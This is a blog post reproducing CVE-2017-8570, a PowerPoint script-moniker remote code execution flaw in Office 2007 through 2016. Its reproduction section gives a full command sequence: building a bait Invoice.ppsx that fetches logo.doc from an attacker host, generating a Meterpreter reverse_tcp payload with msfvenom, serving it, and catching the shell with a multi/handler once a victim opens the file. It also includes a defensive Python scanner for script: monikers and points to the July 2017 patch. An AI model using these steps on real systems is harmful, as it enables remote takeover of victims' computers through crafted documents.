CVE-2017-8570 repeat | LSABLOG


CVE-2017-8570 reproduction

0x01 Overview

In July 2017 Microsoft fixed several Microsoft Office vulnerabilities, among them CVE-2017-8570. It is a logic flaw rather than a memory-corruption bug, so exploitation is simple and reliable, and it gives remote code execution in Microsoft Office.

The root cause is that PowerPoint initializes a "script" Moniker object when it processes the document, and that object is activated when a PowerPoint animation is played during the slide show; at that point the referenced SCT file (a Windows Script Component) is executed. An attacker who can persuade a user to open a crafted PowerPoint file therefore gets code execution with the same privileges as the currently logged-on user.

0x02 Affected versions

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2 (32-bit editions)

Microsoft Office 2010 Service Pack 2 (64-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2016 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

0x03 Reproduction

Step 1: generate the malicious PPSX. Invoice.ppsx is the bait document; the URL is where the SCT (served under the name logo.doc) will be fetched from when the slide show starts.

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://attackerip/logo.doc

Step 2: build the payload that the SCT will download and run.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe

Step 3: start the toolkit in exploit mode. It serves the SCT as logo.doc and serves /tmp/shell.exe at the URL given with -e.

python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe

Step 4: start the handler. The payload must match the one given to msfvenom; LPORT defaults to 4444, which matches Step 2.

msfconsole

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST attackerip

run

Step 5: double-click Invoice.ppsx on the victim machine. When the slide show starts, PowerPoint activates the script moniker, fetches and executes the SCT, which in turn downloads and runs shell.exe, and a Meterpreter session arrives at the handler. "attackerip" must be reachable from the victim over HTTP and on port 4444.
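The check a defender wants after reading the overview and the steps above is a way to tell whether a given .ppsx (or any OOXML package) binds an object to the script moniker. The following scanner is an added example written for this page; it is not code from the original post or from the toolkit. It assumes, based on public exploit samples, that the moniker is referenced through a relationship whose Target starts with "script:" (the post itself only says the script moniker is activated); the sample packages, the "attackerip" host and the logo.doc name are constructed test data.

```python
# Added example (not from the original post or the toolkit): scan an OOXML
# package such as the generated Invoice.ppsx for relationships whose Target
# uses the "script:" moniker. The "script:http://.../logo.doc" Target form is
# an assumption taken from public exploit samples.
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# OPC relationships namespace used by every *.rels part in .pptx/.ppsx/.docx.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TAG = "{%s}Relationship" % REL_NS
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def find_script_monikers(package_bytes):
    """Return (rels_part, rel_id, target) for every relationship in the package
    whose Target uses the script: URL scheme, i.e. an object bound to the
    script moniker. Relative part paths (no scheme) and http(s) hyperlinks are
    ignored; malformed .rels parts are skipped rather than trusted."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            for rel in root.iter(REL_TAG):
                target = (rel.get("Target") or "").strip()
                # urlsplit lowercases the scheme, so "SCRIPT:" is caught too.
                if urlsplit(target).scheme == "script":
                    hits.append((name, rel.get("Id"), target))
    return hits


def build_sample_package(rels_xml):
    """Constructed minimal zip with the OOXML layout of one slide plus its
    relationships part. A stand-in for a .ppsx, not a working PowerPoint file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationships part of a benign slide: an image and a hyperlink.
BENIGN_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%s/image" Target="../media/image1.png"/>'
    '<Relationship Id="rId2" Type="%s/hyperlink" Target="https://example.com/" TargetMode="External"/>'
    '</Relationships>' % (REL_NS, OOXML_REL, OOXML_REL)
)

# Constructed relationships part in the shape of the exploit document
# (assumption: OLE object relationship with a script: Target, as seen in
# public samples; attackerip and logo.doc follow the post's own naming).
SUSPICIOUS_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%s/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    '<Relationship Id="rId3" Type="%s/oleObject" Target="script:http://attackerip/logo.doc" TargetMode="External"/>'
    '</Relationships>' % (REL_NS, OOXML_REL, OOXML_REL)
)


def scan_samples():
    """Run the check over both constructed packages; returns name -> hits."""
    return {
        "benign": find_script_monikers(build_sample_package(BENIGN_RELS)),
        "suspicious": find_script_monikers(build_sample_package(SUSPICIOUS_RELS)),
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # scan a real file: python scan.py Invoice.ppsx
        with open(sys.argv[1], "rb") as f:
            found = find_script_monikers(f.read())
    else:
        found = scan_samples()["suspicious"]
    for part, rel_id, target in found:
        print("script moniker in %s (%s): %s" % (part, rel_id, target))
```

Run it against a real document with `python scan.py Invoice.ppsx`; any hit means an object in the package will bind to the script moniker when activated, which is exactly the trigger described in the overview. The scanner deliberately inspects every .rels part, not just slides, because the same relationship can sit in other parts of a .pptx or .docx.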

0x04 Fix

Install the July 2017 Office security update for the affected version. The per-product download links are listed in Microsoft's advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570
